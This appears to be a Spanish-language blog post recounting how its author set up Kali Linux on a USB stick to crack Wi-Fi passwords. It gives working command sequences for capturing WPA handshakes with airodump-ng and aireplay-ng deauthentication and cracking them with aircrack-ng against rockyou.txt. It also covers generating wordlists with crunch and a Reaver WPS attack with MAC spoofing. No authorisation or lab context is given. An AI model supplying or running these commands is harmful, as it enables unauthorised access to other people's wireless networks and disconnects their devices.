Comenzamos con música para que nos acompañe a lo largo de esta ruta.
Como preámbulo para estos temas algunas definiciones:
Aircrack contiene tres utilidades
principales, usadas en las tres fases
del ataque necesario para recuperar
la clave:
• airodump: herramienta de sniffing utilizada para descubrir las redes que tienen activado WEP,
• aireplay: herramienta de inyección para incrementar el tráfico,
• aircrack: crackeador de claves WEP que utiliza los IVs únicos recogidos.
• airodump: herramienta de sniffing utilizada para descubrir las redes que tienen activado WEP,
• aireplay: herramienta de inyección para incrementar el tráfico,
• aircrack: crackeador de claves WEP que utiliza los IVs únicos recogidos.
tambien tenemos los codigos de airomund-ng
Buena fuente, después de intentar en maquina virtual con este vídeo
, opte por mejor hacer con método persistente USB con este vídeo
y lo que probo fue también con Universal USB Installer 1.9.7.8, y quedo similar, links recomendados : para hacer la parcicion en la unidad USB para generarlo en una lenovo tuve que ingresar al bios y modificar permiso de seguridad, para que pueda arrancar por USB, despues todo Bien para el problema anterior les recomiendo este link,
Bios - Security - Reset to Setup Mode, enable
luego de tener instalado seguimos con los primeros pasos despues de tener kali linux, con este otro video
y para scanear redes WIFI hay varios vídeos como por ejemplo estos dos
#ifconfig
#ifconfig wlan0 down
#macchanger -r wlan0 (cambiamos nuestra mac)
#iwconfig wlan0 mode monitor
#ifconfig wlan0 up
#airodump-ng wlan0 {escanea todos los redes cercanas}
#airodump-ng -c 11 -w nombrecap --bssid MACPRINCIPAL wlan0 {otra terminal para ver todos equipos conectadosa esta mac y guardar en nombrecap} {luego de escojer el equipo ponemos}
#aireplay-ng --deauth 10 -a MACPRINCIPAL -c MACEQUIPOCONECTADO wlan0
{luego de obtener el hanshake}
#aircrack-ng -w '/usr/share/wordlists/rockyou.txt' '/root/nombrecap-01.cap'
otra pocion es crunch , se genera aleatoreamente contraseñas asignado parametros, sin diccionario de datos como en aircrack-ng -w '/usr/share/wordlists/rockyou.txt' '/root/nombrecap-01.cap'
crunch 4 8 a14 ! aircrack-ng -w ´nombre.cap´ -e nombrered o bssid
nota sobre sintaxis de crunch link1 link2 link3 kink4 link5 link6
para generar algo bonito es mejor disponer de espacio ya que genera muchas combinaciones posibles .
Qué es WPA PSK TKIP CCMP – Información de seguridad WiFi
--------------------------------------------------------------
ahora vamos a ver como generar nuestras propias diccionarios o wordlists para hackear por fuerza bruta
para generar wordlists descargar link
Bueno con esta como estoy desde USB de 7 GB , una más o menos de ..2 a 6 me requiere mas "espacio"
Otra herramienta
SUPLANTACIÓN DE MAC
En algunos casos es posible que se
desee / necesite suplantar tu dirección MAC. Reaver es compatible con
Suplantación de MAC con la opción -mac, pero hay que asegurarse de que ha
falsificado su MAC correctamente con el fin de que funcione.
#
ifconfig wlan0 down
#
ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
#
ifconfig wlan0 up
#
airmon-ng start wlan0
#
reaver -i mon0 -b 00:01:02:03:04:05 -vv –mac=00:BA:AD:BE:EF:69
Controladores inalámbricos
compatibles
Los siguientes controladores inalámbricos han sido probados o reportados para
trabajar con éxito con Reaver-WPS:
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb
SÓLO DE FORMA PARCIAL
Los siguientes controladores inalámbricos han tenido un éxito relativo,
y pueden o no pueden trabajar en función de su tarjeta inalámbrica
ath5k
iwlagn
rtl2800usb
b43
en este link se menciona uso de wifislax, En este otro link mas sobre reaver
No hay comentarios:
Publicar un comentario